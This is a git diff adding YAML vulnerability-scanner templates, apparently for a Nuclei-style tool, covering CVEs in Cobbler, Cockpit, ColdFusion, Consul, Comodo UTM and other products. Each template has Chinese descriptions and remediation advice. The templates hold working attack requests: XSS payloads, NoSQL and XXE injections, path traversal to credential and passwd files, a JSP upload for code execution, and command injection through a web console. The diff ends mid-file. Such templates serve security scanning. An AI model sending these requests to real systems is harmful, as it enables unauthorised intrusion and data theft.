b/config/51pwn/yaml/ClinicCases/CVE-2021-38704.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-38704 +info: + name: ClinicCases 7.3.3 Reflected Cross-Site Scripting + author: + - l0ne1y + description: |- + ClinicCases 跨站脚本漏洞 + ClinicCases是一个开源案例管理系统,专为法学院诊所设计。 + + ClinicCases 7.3.3版本存在跨站脚本漏洞,该漏洞源于软件对于用户提交的参数缺少有效的验证和过滤。漏洞允许未经身份验证的攻击者可利用该漏洞通过制作恶意URL引入任意JavaScript。攻击者可以通过会话令牌窃取来接管帐户。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/judsonmitchell/ClinicCases/releases + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body,"") && !contains(body,"/cliniccases/lib/php/data/messages_load.php") + && status_code==200 + matchers-condition: and + path: + - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET + req-condition: true diff --git a/config/51pwn/yaml/Cobbler/CVE-2018-1000226.yaml b/config/51pwn/yaml/Cobbler/CVE-2018-1000226.yaml new file mode 100755 index 000000000..653a8c8ee --- /dev/null +++ b/config/51pwn/yaml/Cobbler/CVE-2018-1000226.yaml @@ -0,0 +1,57 @@ +id: CVE-2018-1000226 +info: + name: Cobbler - Authentication Bypass + author: + - l0ne1y + description: |- + Cobbler 认证绕过漏洞 + Cobbler是一款网络安装服务器套件,它能够快速建立Linux网络安装环境。 + + Cobbler 2.0.0+及之前版本中的XMLRPC API(/cobbler-api)存在访问控制错误漏洞,该漏洞源于程序没有正确的验证API端点内的安全令牌。攻击者可利用该漏洞提升权限,操纵或泄露数据,获取LDAP凭证。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/cobbler/cobbler + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'Content-Type: text/xml' + - type: word + part: body + words: + - + - type: dsl + dsl: + - '!contains(tolower(body), ''faultCode'')' + - type: regex + part: body + regex: + - (.*[a-zA-Z0-9].+==) + matchers-condition: and + raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + _CobblerXMLRPCInterface__make_token + + + + cobbler + + + + diff --git a/config/51pwn/yaml/Cobbler/CVE-2021-40323.yaml b/config/51pwn/yaml/Cobbler/CVE-2021-40323.yaml new file mode 100755 index 000000000..a88d15cdc --- /dev/null +++ b/config/51pwn/yaml/Cobbler/CVE-2021-40323.yaml @@ -0,0 +1,92 @@ +id: CVE-2021-40323 +info: + name: Cobbler <3.3.0 - Remote Code Execution + author: + - l0ne1y + description: |- + Cobbler 远程代码执行漏洞 + Cobbler是一款网络安装服务器套件,它主要用于快速建立Linux网络安装环境。 + + Cobbler 3.3.0 之前的版本存在安全漏洞,该漏洞可以导致远程代码执行。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/cobbler/cobbler/releases + + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - text/xml + - type: regex + condition: or + regex: + - root:.*:0 + - bin:.*:1 + - nobody:.*:99 + extractors: + - name: profile + type: regex + regex: + - (.*?) + group: 1 + internal: true + matchers-condition: and + raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + find_profile + + + + + + name + + * + + + + + + + + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + generate_script + + + + {{profile}} + + + + + + + + + + /etc/passwd + + + + diff --git a/config/51pwn/yaml/Cockpit/CVE-2020-35846.yaml b/config/51pwn/yaml/Cockpit/CVE-2020-35846.yaml new file mode 100755 index 000000000..1f2df7ea4 --- /dev/null +++ b/config/51pwn/yaml/Cockpit/CVE-2020-35846.yaml @@ -0,0 +1,47 @@ +id: CVE-2020-35846 +info: + name: Agentejo Cockpit < 0.11.2 NoSQL Injection + author: + - l0ne1y + description: |- + Agentejo Cockpit SQL注入漏洞 + Agentejo Cockpit是德国Agentejo公司的一款用于管理网站结构化内容的管理系统。 + + Agentejo Cockpit 0.11.2之前版本存在SQL注入漏洞,该漏洞源于允许通过控制器Auth.php检查函数进行NoSQL注入。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/agentejo/cockpit/commit/79fc9631ffa29146e3124ceaf99879b92e1ef24b + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 4、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - password_verify() expects parameter + matchers-condition: and + path: + - '{{BaseURL}}/auth/check' + method: POST + body: | + { + "auth": { + "user": { + "$eq": "admin" + }, + "password": [ + 0 + ] + } + } + headers: + Content-Type: application/json diff --git a/config/51pwn/yaml/Cockpit/CVE-2020-35847.yaml b/config/51pwn/yaml/Cockpit/CVE-2020-35847.yaml new file mode 100755 index 000000000..581962b6b --- /dev/null +++ b/config/51pwn/yaml/Cockpit/CVE-2020-35847.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-35847 +info: + name: Agentejo Cockpit <0.11.2 NoSQL Injection + author: + - l0ne1y + description: |- + Agentejo Cockpit SQL注入漏洞 + Agentejo Cockpit是德国Agentejo公司的一款用于管理网站结构化内容的管理系统。 + + Agentejo Cockpit 0.11.2之前版本存在SQL注入漏洞,该漏洞允许通过控制器Auth.php resetpassword函数注入NoSQL。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/agentejo/cockpit/commit/79fc9631ffa29146e3124ceaf99879b92e1ef24b + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 4、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: regex + part: body + regex: + - string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)" + path: + - '{{BaseURL}}/auth/requestreset' + method: POST + body: | + { + "user": { + "$func": "var_dump" + } + } + headers: + Content-Type: application/json diff --git a/config/51pwn/yaml/Cockpit/CVE-2020-35848.yaml b/config/51pwn/yaml/Cockpit/CVE-2020-35848.yaml new file mode 100755 index 000000000..659e8c15c --- /dev/null +++ b/config/51pwn/yaml/Cockpit/CVE-2020-35848.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-35848 +info: + name: Agentejo Cockpit <0.12.0 - NoSQL Injection + author: + - l0ne1y + description: |- + Agentejo Cockpit SQL注入漏洞 + Agentejo Cockpit是德国Agentejo公司的一款用于管理网站结构化内容的管理系统。 + + Agentejo Cockpit 0.11.2之前版本存在SQL注入漏洞,该漏洞允许通过控制器Auth.php newpassword函数注入NoSQL。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/agentejo/cockpit/commit/79fc9631ffa29146e3124ceaf99879b92e1ef24b + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 4、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: regex + part: body + regex: + - string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)" + path: + - '{{BaseURL}}/auth/newpassword' + method: POST + body: | + { + "token": { + "$func": "var_dump" + } + } + headers: + Content-Type: application/json diff --git a/config/51pwn/yaml/Cocoon/CVE-2020-11991.yaml b/config/51pwn/yaml/Cocoon/CVE-2020-11991.yaml new file mode 100755 index 000000000..720fba09c --- /dev/null +++ b/config/51pwn/yaml/Cocoon/CVE-2020-11991.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-11991 +info: + name: Apache Cocoon 2.1.12 XML Injection + author: + - l0ne1y + description: |- + apache cocoon StreamGenerator XXE漏洞 + 漏洞存在于Apache Cocoon中的StreamGenerator组件中,该组件将会解析用户提交的XML格式的数据,攻击者会通过发送精心构造的XML格式的恶意数据来触发漏洞,当传入的参数存在敏感操作时,达到获取目标系统敏感文件及服务器权限 + severity: high + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + + **临时修复方案** + 1、禁用外部实体 + 2、过滤用户提交的XML数据,关键词: + ]> + + John + &ent; + + headers: + Content-Type: text/xml diff --git a/config/51pwn/yaml/Cofax/CVE-2005-4385.yaml b/config/51pwn/yaml/Cofax/CVE-2005-4385.yaml new file mode 100755 index 000000000..4869d32ff --- /dev/null +++ b/config/51pwn/yaml/Cofax/CVE-2005-4385.yaml @@ -0,0 +1,25 @@ +id: CVE-2005-4385 +info: + name: Cofax <= 2.0RC3 XSS + author: + - l0ne1y + description: |- + Cofax 跨站脚本漏洞 + Cofax 2.0 RC3及更早版本中的search.htm存在跨站脚本攻击漏洞,远程攻击者可通过searchstring参数注入任意Web脚本或HTML。 + severity: medium + remediation: |- + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '''>"' + matchers-condition: and + path: + - '{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/ColdFusion/CVE-2009-1872.yaml b/config/51pwn/yaml/ColdFusion/CVE-2009-1872.yaml new file mode 100755 index 000000000..19dbd05a5 --- /dev/null +++ b/config/51pwn/yaml/ColdFusion/CVE-2009-1872.yaml @@ -0,0 +1,35 @@ +id: CVE-2009-1872 +info: + name: Adobe Coldfusion 8 linked XSS vulnerabilies + author: + - l0ne1y + description: |- + Adobe ColdFusion Server 跨站脚本漏洞 + ColdFusion是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术,可以与XML、Web Services和Microsoft.NET环境相集成。 + + ColdFusion的searchlog.cfm、_logintowizard.cfm、_authenticatewizarduser.cfm、_authenticatewizarduser.cfm脚本没有正确过滤用户所提交的startRow等参数,远程攻击者可以通过提交恶意请求执行跨站脚本或跨站请求伪造攻击。此外ColdFusion中的双重编码空字符漏洞可能导致信息泄露,会话固定漏洞可能导致权限提升。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://www.adobe.com/support/security/bulletins/apsb09-12.html + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/ColdFusion/CVE-2010-2861.yaml b/config/51pwn/yaml/ColdFusion/CVE-2010-2861.yaml new file mode 100755 index 000000000..3fb12a68a --- /dev/null +++ b/config/51pwn/yaml/ColdFusion/CVE-2010-2861.yaml @@ -0,0 +1,32 @@ +id: CVE-2010-2861 +info: + name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI + author: + - l0ne1y + description: |- + Adobe ColdFusion管理控制台任意文件读取漏洞 + Adobe ColdFusion是一款高效的网络应用服务器开发环境。 Adobe ColdFusion 9.0.1及之前版本的管理控制台中存在多个目录遍历漏洞。远程攻击者可借助向CFIDE/administrator/中的CFIDE/administrator/settings/mappings.cfm,logging/settings.cfm,datasources/index.cfm,j2eepackaging/editarchive.cfm和enter.cfm发送的locale参数读取任意文件。 + severity: medium + remediation: | + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://www.adobe.com/support/security/bulletins/apsb10-18.html + + 临时修复方案: + 1、过滤目录跳转符、字符截断符等 + 2、限制用户对CFIDE/administrator/settings/mappings.cfm、logging/settings.cfm、datasources/index.cfm、j2eepackaging/editarchive.cfm、enter.cfm等的访问 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - rdspassword= + - encrypted= + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en' + method: GET diff --git a/config/51pwn/yaml/ColdFusion/CVE-2018-15961.yaml b/config/51pwn/yaml/ColdFusion/CVE-2018-15961.yaml new file mode 100755 index 000000000..f4118f7c0 --- /dev/null +++ b/config/51pwn/yaml/ColdFusion/CVE-2018-15961.yaml @@ -0,0 +1,64 @@ +id: CVE-2018-15961 +info: + name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution + author: + - l0ne1y + description: |- + Adobe ColdFusion upload.cfm 文件上传漏洞 + Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 + + Adobe ColdFusion中存在安全漏洞,该漏洞源于程序未限制文件的上传。攻击者可利用该漏洞执行任意代码。以下版本受到影响:Adobe ColdFusion (2018年发布) 2018.0.0.310739版本,ColdFusion (2016年发布)Update 6及之前版本,ColdFusion 11 Update 14及之前版本。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 +requests: +- matchers: + - type: word + words: + - ddbb3e76f92e78c445c8ecb392beb225 + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" + Content-Type: image/jpeg + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + + {{randstr}}.jsp + -----------------------------24464570528145-- + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/ColdFusion/coldfusion-debug-xss.yaml b/config/51pwn/yaml/ColdFusion/coldfusion-debug-xss.yaml new file mode 100755 index 000000000..8562ab2aa --- /dev/null +++ b/config/51pwn/yaml/ColdFusion/coldfusion-debug-xss.yaml @@ -0,0 +1,36 @@ +id: coldfusion-debug-xss +info: + name: Adobe ColdFusion Debug Page XSS + author: + - l0ne1y + description: |- + Adobe ColdFusion Debug页面跨站脚本漏洞 + Adobe ColdFusion是美国奥多比(Adobe)公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 + + Adobe ColdFusion中的调试页面存在跨站脚本漏洞 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://helpx.adobe.com/security/products/coldfusion.html + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - '"cf_main_cf" src="javascript:alert(1)"' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' + - '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)' + method: GET diff --git a/config/51pwn/yaml/ColdFusion/unpatched-coldfusion.yaml b/config/51pwn/yaml/ColdFusion/unpatched-coldfusion.yaml new file mode 100755 index 000000000..63fb3214e --- /dev/null +++ b/config/51pwn/yaml/ColdFusion/unpatched-coldfusion.yaml @@ -0,0 +1,37 @@ +id: unpatched-coldfusion +info: + name: Adobe ColdFusion - Improper Input Validation - Arbitrary Code Execution + author: + - l0ne1y + description: |- + Adobe ColdFusion 跨站脚本漏洞 + Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 + + ColdFusion 2016、2018版本存在跨站脚本漏洞,攻击者可利用该漏洞导致任意代码执行。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: regex + regex: + - eval\(\"\(\"\+json\+\"\)\"\) + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js' + - '{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js' + - '{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js' + - '{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js' + - '{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js' + - '{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js' + - '{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/Combodo iTop/CVE-2015-6544.yaml b/config/51pwn/yaml/Combodo iTop/CVE-2015-6544.yaml new file mode 100755 index 000000000..14f198d99 --- /dev/null +++ b/config/51pwn/yaml/Combodo iTop/CVE-2015-6544.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-6544 +info: + name: iTop XSS + author: + - l0ne1y + description: "Combodo iTop 跨站脚本漏洞\n Combodo iTop(又名IT Operations Portal,IT运营门户)是法国Combodo公司的一套基于ITIL开发且用于IT环境日常运营的开源Web应用程序。该工具提供事件管理、配置管理和问题管理等功能。\n\nCombodo + iTop 2.2.0-2459版本中的application/dashboard.class.inc.php文件存在跨站脚本漏洞。远程攻击者可借助dashboard标题利用该漏洞注入任意的Web脚本或HTML。 " + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.combodo.com/itop + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/CommCell/CVE-2020-25780.yaml b/config/51pwn/yaml/CommCell/CVE-2020-25780.yaml new file mode 100755 index 000000000..c1b44ae37 --- /dev/null +++ b/config/51pwn/yaml/CommCell/CVE-2020-25780.yaml @@ -0,0 +1,47 @@ +id: CVE-2020-25780 +info: + name: Commvault CommCell Directory Traversal + author: + - l0ne1y + description: |- + Commvault CommCell 任意文件下载漏洞 + Commvault CommCell 是美国Commvault公司的一款应用于企业环境的存储管理工具。 + + Commvault CommCell 存在路径遍历漏洞,该漏洞源于尝试查看日志文件可以改为查看文件 在日志文件文件夹之外。以下产品及版本受到影响:14.68版本, 15.x系列15.58之前版本, 16.x系列16.44之前版本, 17.x系列17.29之前版本, 18.x系列18.13之前版本。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://kb.commvault.com/article/63264 + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + words: + - downLoadFileResult + - type: status + status: + - 200 + matchers-condition: and + path: + - http://{{Host}}:81/SearchSvc/CVSearchService.svc + method: POST + body: | + + + + + c:/Windows/system.ini + + + + headers: + Cookie: Login + content-type: text/xml + soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile diff --git a/config/51pwn/yaml/Comodo UTM Firewall/CVE-2018-17431.yaml b/config/51pwn/yaml/Comodo UTM Firewall/CVE-2018-17431.yaml new file mode 100755 index 000000000..75b728e96 --- /dev/null +++ b/config/51pwn/yaml/Comodo UTM Firewall/CVE-2018-17431.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-17431 +info: + name: Comodo Unified Threat Management Web Console - Remote Code Execution + author: + - l0ne1y + description: |- + Comodo UTM Firewall Web Console 远程命令执行漏洞 + Comodo UTM Firewall是美国Comodo Group公司的一款UTM防火墙。该产品包括反垃圾邮件、内容过滤、Web过滤和防病毒等功能。Web Console是其中的一个基于Web的管理控制台程序。 + + Comodo UTM Firewall 2.7.0之前版本中的Web Console存在安全漏洞。远程攻击者可借助特制的URL利用该漏洞未经身份验证便可执行任意代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.comodo.com/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 +requests: +- matchers: + - type: word + part: body + words: + - Configuration has been altered + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 + Host: {{Hostname}} + Connection: close + - | + GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 + Host: {{Hostname}} + Connection: close diff --git a/config/51pwn/yaml/Consul/CVE-2020-25864.yaml b/config/51pwn/yaml/Consul/CVE-2020-25864.yaml new file mode 100755 index 000000000..2df1a5e94 --- /dev/null +++ b/config/51pwn/yaml/Consul/CVE-2020-25864.yaml @@ -0,0 +1,43 @@ +id: CVE-2020-25864 +info: + name: HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) + raw mode is vulnerable to cross-site scripting + author: + - l0ne1y + description: |- + HashiCorp Consul and Consul Enterprise 跨站脚本漏洞 + Hashicorp HashiCorp Consul是美国HashiCorp(Hashicorp)公司的一套分布式、高可用数据中心感知解决方案。该产品用于跨动态分布式基础架构连接和配置应用程序。 + + HashiCorp Consul and Consul Enterprise 1.9.4版本存在安全漏洞,该漏洞源于原始模式容易受到跨站点脚本攻击。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + - type: word + part: body_2 + words: + - + matchers-condition: and + raw: + - | + PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + + + - | + GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Consul/consul-rexec-rce.yaml b/config/51pwn/yaml/Consul/consul-rexec-rce.yaml new file mode 100755 index 000000000..137c57923 --- /dev/null +++ b/config/51pwn/yaml/Consul/consul-rexec-rce.yaml @@ -0,0 +1,39 @@ +id: consul-rexec-rce +info: + name: Consul Rexec Rce + author: + - l0ne1y + description: |2- + Hashicorp Consul Rexec API远程命令执行漏洞 + Consul是HashiCorp公司推出的一款开源工具,用于实现分布式系统的服务发现与配置。与其他分布式服务注册与发现的方案相比,Consul提供的方案更为“一站式”。Consul内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(例如ZooKeeper等),使用方式也相对简单。 + + Consul使用Go语言编写,因此具有天然的可移植性(支持Linux、Windows和Mac OS X系统);且安装包中仅包含一个可执行文件,便于部署,可与Docker等轻量级容器无缝配合。 + + 在特定配置下,恶意攻击者可以通过发送精心构造的HTTP请求在未经授权的情况下在Consul服务端远程执行命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.consul.io/downloads + + 临时修复方案: + 1、禁用Consul服务器上的脚本检查功能 + 2、确保Consul HTTP API服务无法通过外网访问或调用 +requests: +- matchers: + - type: word + part: body + words: + - DisableRemoteExec + - '"": false' + - type: word + part: header + words: + - json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/v1/agent/self' + method: GET diff --git a/config/51pwn/yaml/Consul/consul-service-rce.yaml b/config/51pwn/yaml/Consul/consul-service-rce.yaml new file mode 100755 index 000000000..552dc7956 --- /dev/null +++ 